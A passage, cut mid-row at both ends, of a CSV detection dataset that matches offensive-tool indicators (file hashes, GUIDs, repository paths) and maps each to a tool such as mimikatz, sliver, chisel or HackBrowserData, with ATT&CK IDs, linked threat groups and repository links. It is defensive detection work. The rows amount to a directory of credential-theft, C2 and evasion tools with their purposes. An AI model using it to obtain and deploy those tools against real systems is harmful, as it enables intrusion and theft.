- T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","34535" "*b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508*","b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","34537" "*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*",".{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","0","#filehash","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","34538" "*b2383e05411ba4a0e24dbfc67e5e4e1ddeae37acdf1137bccbf8d190d13c78a5*",".{0,1000}b2383e05411ba4a0e24dbfc67e5e4e1ddeae37acdf1137bccbf8d190d13c78a5.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#filehash","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","34539" "*b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241*",".{0,1000}b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34540" "*b23cad6402b0c5f9fd57be07243481a351cf32a0629d7cc03551d1621a6c208c*",".{0,1000}b23cad6402b0c5f9fd57be07243481a351cf32a0629d7cc03551d1621a6c208c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34541" "*b23r0/cliws*",".{0,1000}b23r0\/cliws.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34542" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","34543" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","34544" "*b23r0/rsocx*",".{0,1000}b23r0\/rsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - 
T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","34545" "*b23r0@foxmail.com*",".{0,1000}b23r0\@foxmail\.com.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux #email","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34546" "*b241d58192f46cf9b508518c1a31062b50731226100391b0dfa21b929c1a1f16*",".{0,1000}b241d58192f46cf9b508518c1a31062b50731226100391b0dfa21b929c1a1f16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34547" "*b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e*",".{0,1000}b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34549" "*b256ce69db7a774dc39ccef3b0281135b3fc57b7c7826322ed6736ec5259839a*",".{0,1000}b256ce69db7a774dc39ccef3b0281135b3fc57b7c7826322ed6736ec5259839a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34550" "*b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b*",".{0,1000}b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34551" "*b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d*",".{0,1000}b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34552" "*b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44*",".{0,1000}b260abb5986b96cb9308722a27d6172313cacdcd16d6f8d6a00867bf095dcf44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34554" "*b262b397386f413b6b815b409d54a9c5ae65dc0730c3d9918132a23f3d99a1da*",".{0,1000}b262b397386f413b6b815b409d54a9c5ae65dc0730c3d9918132a23f3d99a1da.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34555" "*b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59*",".{0,1000}b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34556" "*b264796db3513dbee419561215cb7c5863d70088dd5e8286829801bc72c27d0b*",".{0,1000}b264796db3513dbee419561215cb7c5863d70088dd5e8286829801bc72c27d0b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34557" "*b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd*",".{0,1000}b26b8713dc24bec3c5b0be456a1bbc058a8450c280d614695a691fa13ac6dbfd.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","34558" "*b270e67a46481326734fafba78c9ba47d645754b98986d56b053d76cfc649467*",".{0,1000}b270e67a46481326734fafba78c9ba47d645754b98986d56b053d76cfc649467.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34559" "*b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f*",".{0,1000}b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34561" "*b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f*",".{0,1000}b2790bce687c664f57f7dc0c08ac27488506fd510bdf4cc20d87d03a22270c0f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - 
Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34562" "*b280f4b1b67ec990eb9522eb93f9d04825e0b31ff183d9f4df9b6db89ed832a9*",".{0,1000}b280f4b1b67ec990eb9522eb93f9d04825e0b31ff183d9f4df9b6db89ed832a9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34564" "*b286fd04310a342dffe4306712f8d0cddcb3c44e8c0c07e8be14bffc87cd26d0*",".{0,1000}b286fd04310a342dffe4306712f8d0cddcb3c44e8c0c07e8be14bffc87cd26d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34566" "*b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd*",".{0,1000}b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34567" "*B2924789-9912-4B6F-8F7B-53240AC3BA0E*",".{0,1000}B2924789\-9912\-4B6F\-8F7B\-53240AC3BA0E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement 
(DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","34569" "*b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e*",".{0,1000}b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","34570" "*b2956027022f69baa93e6c55c69df6ace602d6ad61cb4ddfdaedd4c9be46d7b6*",".{0,1000}b2956027022f69baa93e6c55c69df6ace602d6ad61cb4ddfdaedd4c9be46d7b6.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34571" "*b297813bf0834ce143142bd53ca142e54844abd57c60ee01279a2171f32fdb77*",".{0,1000}b297813bf0834ce143142bd53ca142e54844abd57c60ee01279a2171f32fdb77.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34572" "*b2992ba236d1f4cffb77149e3c67a19d59f8131249e3ffc16b791ec2522b9629*",".{0,1000}b2992ba236d1f4cffb77149e3c67a19d59f8131249e3ffc16b791ec2522b9629.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34573" "*b29c1de4f6292cd455141ceec781f9b83461996486aea93a11f7804c6af5477b*",".{0,1000}b29c1de4f6292cd455141ceec781f9b83461996486aea93a11f7804c6af5477b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34574" "*b2a02c9a9eb70c92a0af31a0485b345375b545a639f01e3cba8bdb5b09149662*",".{0,1000}b2a02c9a9eb70c92a0af31a0485b345375b545a639f01e3cba8bdb5b09149662.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34575" "*b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa*",".{0,1000}b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","34576" "*b2a71ab4206470ed4091b90dc0541a8f9dd22ecf3c8db02997f29d407d5c317a*",".{0,1000}b2a71ab4206470ed4091b90dc0541a8f9dd22ecf3c8db02997f29d407d5c317a.{0,1000}","offensive_tool_keyword","bruteratel","A Customized 
Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34577" "*b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c*",".{0,1000}b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34578" "*b2ad37703c99fcd399e6213bd26cbffe2c6a72d5f8d8bc32b455af42fa002fab*",".{0,1000}b2ad37703c99fcd399e6213bd26cbffe2c6a72d5f8d8bc32b455af42fa002fab.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34579" "*b2ae884a70f15e40d4a5ceaaf5609c20422f524eb3f1f25ea14c57bfce64220f*",".{0,1000}b2ae884a70f15e40d4a5ceaaf5609c20422f524eb3f1f25ea14c57bfce64220f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - 
T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34580" "*b2b19b7cfc5f45ffcd83e6a099c40ba085cb86c4ab0ac4d0d4ad6aa8e0f40c4c*",".{0,1000}b2b19b7cfc5f45ffcd83e6a099c40ba085cb86c4ab0ac4d0d4ad6aa8e0f40c4c.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34582" "*b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442*",".{0,1000}b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34583" "*b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442*",".{0,1000}b2b344b380da8acc1b2409c079cac635df47700af3aa1193c94dae2487011442.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 
T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","34584" "*b2b3853690de7ac7089834b95a6aaf107baa61d6f85d3c941abd67f2b8540020*",".{0,1000}b2b3853690de7ac7089834b95a6aaf107baa61d6f85d3c941abd67f2b8540020.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","34585" "*B2B4238B-1055-4679-B7D5-7CCE2397098E*",".{0,1000}B2B4238B\-1055\-4679\-B7D5\-7CCE2397098E.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#GUIDproject","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34586" "*b2b8156b03d2f5abf54642ed17a3d128598debfdce435fb61e5572507d1b131e*",".{0,1000}b2b8156b03d2f5abf54642ed17a3d128598debfdce435fb61e5572507d1b131e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34588" "*b2bb856a232072bbf9dc478fdb3a0fbdf394057ce255ab586d8ea7e34fa2abc0*",".{0,1000}b2bb856a232072bbf9dc478fdb3a0fbdf394057ce255ab586d8ea7e34fa2abc0.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - 
TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","34589" "*b2bb8f3b4b3d50a2a26a0c48fad1a01f9d65ebb7c6a5e6dcd374408fdbc64257*",".{0,1000}b2bb8f3b4b3d50a2a26a0c48fad1a01f9d65ebb7c6a5e6dcd374408fdbc64257.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34590" "*b2c11ff250d4ece261e20ab73f7aeb22222698c365aa0752aa3d8a5785be8ed1*",".{0,1000}b2c11ff250d4ece261e20ab73f7aeb22222698c365aa0752aa3d8a5785be8ed1.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","34591" "*b2c357a06c797a0f3fcc6f7995abe577df9b7384e794446022cd6a8dde2d9444*",".{0,1000}b2c357a06c797a0f3fcc6f7995abe577df9b7384e794446022cd6a8dde2d9444.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
